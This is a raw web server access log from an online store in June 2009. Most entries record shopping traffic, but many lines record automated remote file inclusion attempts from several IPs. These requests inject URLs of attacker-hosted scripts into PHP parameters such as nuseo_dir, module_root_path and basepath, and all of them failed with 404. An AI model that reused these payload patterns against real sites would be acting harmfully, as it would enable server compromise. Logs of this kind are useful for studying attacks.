70.61.119.142 - - [10/Jun/2009:07:55:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89434A2217000D1E046+M37+ENG HTTP/1.1" 200 69608 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F88484BC26700FD6E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
118.219.232.137 - - [10/Jun/2009:07:55:21 -0400] "GET /logs//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:07:55:21 -0400] "GET /logs/access_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:07:55:22 -0400] "GET //libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:55:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894A42F2D700080E046+M37+ENG HTTP/1.1" 200 69059 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89434A2217000D1E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
118.219.232.137 - - [10/Jun/2009:07:55:34 -0400] "GET /logs/access_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:07:55:34 -0400] "GET /logs//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:07:55:35 -0400] "GET //libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jun/2009:07:55:37 -0400] "GET /logs/access_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:55:50 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:55:50 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:55:50 -0400] "GET /logs/access_log.Q109053100%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jun/2009:07:55:51 -0400] "GET /logs/error_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:55:57 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:55:57 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:55:57 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:56:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89424BC2870018CE046+M37+ENG HTTP/1.1" 200 69201 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894A42F2D700080E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
211.234.107.233 - - [10/Jun/2009:07:56:03 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:56:04 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:56:04 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:56:06 -0400] "GET /logs/access_log.Q109052600%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:56:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89464C12E700340E046+M37+ENG HTTP/1.1" 200 69105 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89424BC2870018CE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
118.219.232.137 - - [10/Jun/2009:07:56:13 -0400] "GET /logs/error_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:56:15 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:56:15 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:56:15 -0400] "GET /logs/access_log.Q109053100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:56:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C52E700369E046+M37+ENG HTTP/1.1" 200 69531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89464C12E700340E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:56:29 -0400] "GET /images/items/4792421_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C52E700369E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
218.249.36.194 - - [10/Jun/2009:07:56:30 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:07:56:32 -0400] "GET /logs/error_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
172.16.1.168 - - [10/Jun/2009:07:56:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:07:56:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:07:56:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.61.119.142 - - [10/Jun/2009:07:56:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4BC287004B6E046+M37+ENG HTTP/1.1" 200 69118 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C52E700369E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:56:47 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89464E12B700556E046+M37+ENG HTTP/1.1" 200 69529 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4BC287004B6E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:56:48 -0400] "GET /images/items/2001109_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89464E12B700556E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
118.219.232.137 - - [10/Jun/2009:07:56:53 -0400] "GET /logs/access_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:57:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894F4C4267005BCE046+M37+ENG HTTP/1.1" 200 69572 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89464E12B700556E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C9207006C8E046+M37+ENG HTTP/1.1" 200 71089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894F4C4267005BCE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:08 -0400] "GET /images/items/0800110_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C9207006C8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:08 -0400] "GET /images/items/0800160_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C9207006C8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:08 -0400] "GET /images/items/0808236_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C9207006C8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
118.219.232.137 - - [10/Jun/2009:07:57:08 -0400] "GET /logs/access_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:07:57:11 -0400] "GET /logs/error_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:57:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894340E2E7007F7E046+M37+ENG HTTP/1.1" 200 70366 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C4C9207006C8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:15 -0400] "GET /images/items/0531025_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894340E2E7007F7E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
89.223.3.98 - - [10/Jun/2009:07:57:16 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:57:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894A4D22B70074DE046+M37+ENG HTTP/1.1" 200 70300 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894340E2E7007F7E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:24 -0400] "GET /images/items/0034101_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894A4D22B70074DE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:24 -0400] "GET /images/items/0116095_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894A4D22B70074DE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
118.219.232.137 - - [10/Jun/2009:07:57:32 -0400] "GET /logs/error_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:57:33 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:57:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.61.119.142 - - [10/Jun/2009:07:57:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89424D72F7008CAE046+M37+ENG HTTP/1.1" 200 70307 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894A4D22B70074DE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:40 -0400] "GET /images/items/0034101_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89424D72F7008CAE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:57:40 -0400] "GET /images/items/0116095_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89424D72F7008CAE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
218.249.36.194 - - [10/Jun/2009:07:57:55 -0400] "GET /kb_constants.php?module_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:57:55 -0400] "GET /logs/kb_constants.php?module_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:57:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89424122C7009D4E046+M37+ENG HTTP/1.1" 200 43514 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89424D72F7008CAE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894148B20700A1AE046+M37+ENG HTTP/1.1" 200 77185 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89424122C7009D4E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894744227700BD7E046+M37+ENG HTTP/1.1" 200 69548 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894148B20700A1AE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894B44224700BE1E046+M37+ENG HTTP/1.1" 200 69134 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894744227700BD7E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4D42E700B3BE046+M37+ENG HTTP/1.1" 200 71608 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894B44224700BE1E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89444C221700C05E046+M37+ENG HTTP/1.1" 200 71087 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4D42E700B3BE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:47 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894C40623700C3CE046+M37+ENG HTTP/1.1" 200 70306 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89444C221700C05E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:48 -0400] "GET /images/items/0034101_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C40623700C3CE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:58:48 -0400] "GET /images/items/0116095_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C40623700C3CE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
218.249.36.194 - - [10/Jun/2009:07:58:49 -0400] "GET /kb_constants.php?module_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:58:49 -0400] "GET /logs/kb_constants.php?module_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:58:51 -0400] "GET /logs/access_log.Q109053100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:58:51 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:58:59 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89434D026700D41E046+M37+ENG HTTP/1.1" 200 70307 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894C40623700C3CE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:00 -0400] "GET /images/items/0034101_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89434D026700D41E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:00 -0400] "GET /images/items/0116095_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89434D026700D41E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89434D026700D41E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4332C700D58E046+M37+ENG HTTP/1.1" 200 61129 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89434D026700D41E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:12 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4332C700D58E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894848421700E4EE046+M37+ENG HTTP/1.1" 200 61131 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894E4332C700D58E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:59:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F89474B025700F55E046+M37+ENG HTTP/1.1" 200 38948 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894848421700E4EE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
212.158.160.121 - - [10/Jun/2009:07:59:35 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
212.158.160.121 - - [10/Jun/2009:07:59:36 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:59:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F894F49122700FBCE046+M37+ENG HTTP/1.1" 200 45287 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F89474B025700F55E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:00:08 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F8A484BB207000BBE046+M37+ENG HTTP/1.1" 200 44370 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F894F49122700FBCE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
172.16.1.180 - - [10/Jun/2009:08:00:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:00:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
